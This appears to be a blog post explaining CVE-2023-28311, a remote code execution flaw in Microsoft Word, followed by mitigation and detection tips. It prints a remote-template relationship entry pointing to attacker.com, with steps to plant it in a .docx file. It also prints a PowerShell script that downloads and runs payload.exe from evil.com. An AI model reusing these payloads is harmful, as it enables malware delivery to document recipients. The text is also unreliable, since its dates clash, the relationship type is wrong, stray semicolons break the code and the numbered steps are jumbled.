CVE-2023-28311 - Understanding and Exploiting the Microsoft Word Remote Code Execution Vulnerability

Microsoft Word is one of the world's most widely used document editing software. In May 2023, researchers and attackers discovered and began exploiting a critical vulnerability—CVE-2023-28311—that allows remote code execution (RCE) via specially crafted Word files. This post breaks down how the vulnerability works, shows you code snippets that demonstrate the exploit, and shares practical steps for reducing your risk. If you want a deep look at CVE-2023-28311 in plain language, you’re in the right place.

What is CVE-2023-28311?

CVE-2023-28311 is a remote code execution vulnerability found in Microsoft Word. The vulnerability allows someone to run arbitrary code on a victim’s machine simply by tricking them into opening a malicious document. This kind of exploit can install malware, steal data, or open doors for more attacks—all without user awareness.

Patch Released: May 2023

You can see the official listing here: Microsoft Security Update Guide - CVE-2023-28311

How the Attack Works

The vulnerability takes advantage of how Microsoft Word handles certain file objects, especially OLE (Object Linking and Embedding) objects or external links. If a Word document contains a malicious object that refers to a remote resource, and the user opens that document, Word can automatically reach out to the attacker’s server and fetch a malicious payload—sometimes even without a click from the user!

Attacker crafts a malicious Word file with a hidden OLE object or link to a payload.

2. Victim opens the document—often sent by spear-phishing email or downloaded from a malicious website.

Real-World Exploit Example

Researchers have demonstrated exploiting this bug by embedding a link in the Word document that triggers the download and execution of a remote script or executable. Below is a simplified demonstration using code.

1. Creating a Malicious Word File

One common technique uses a Word document with a remote template reference, so when Word opens the document, it fetches and executes code from an external server.

Step-by-Step Snippet

<!-- inside document.xml.rels of a .docx file -->
<Relationship Id="rId1" 
              Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"; 
              Target="http://attacker.com/malicious-template.dotm"/>;

Change the extension of a Word file from .docx to .zip

2. Extract contents and navigate to word/_rels/document.xml.rels

Zip the contents and rename extension back to .docx

When the victim opens the document, Word attempts to connect to attacker.com and load the malicious-template.dotm file, which could execute VBA macros, shell commands, or more sophisticated payloads.

2. Serving a Payload

Example: Host a PowerShell script on your server that drops malware

# payload.ps1 hosted on attacker server
Invoke-WebRequest "http://evil.com/payload.exe"; -OutFile "$env:TEMP\payload.exe"
Start-Process "$env:TEMP\payload.exe"

You could direct your malicious Word template to call this script, leading to silent malware execution.

Some security researchers on GitHub have posted proof-of-concept exploits

- Researcher PoC on GitHub
- AttackerKB Analysis

*Note: Always use these resources for educational and defensive purposes. Do not try to attack others.*

Update Microsoft Office immediately—Microsoft patched this hole in May 2023.

- Disable Macros and External Content: Set Office to block all macros and disable automatic content loading.
- Use Protected View: Word opens downloaded files in a sandbox by default. Don’t enable editing unless you fully trust the sender.
- Monitor Network Connections: Security solutions can alert you if Word tries to access suspicious URLs.

Blue teams can spot suspicious activity by looking for

- Outbound HTTP/S requests from Word processes to unknown domains

Microsoft released fixes as part of their Patch Tuesday (May 2023). Here’s the direct link

- May 2023 Security Updates

Update your software as soon as possible to stay protected.

References

- Microsoft CVE-2023-28311 Security Update
- Rapid7 Analysis of CVE-2023-28311
- CISA Known Exploited Vulnerabilities Catalog
- Exploit PoC by Chovvy on Github

Conclusion

CVE-2023-28311 is a classic example of why regular software updates and cautious cyber hygiene are so vital. A simple downloaded document can compromise your whole system! By understanding the technical details, you can better defend yourself and your organization. Always be skeptical of unexpected attachments, and keep your defenses (and Office suite) updated.

Timeline

Published on: 04/11/2023 21:15:00 UTC
Last modified on: 04/14/2023 22:15:00 UTC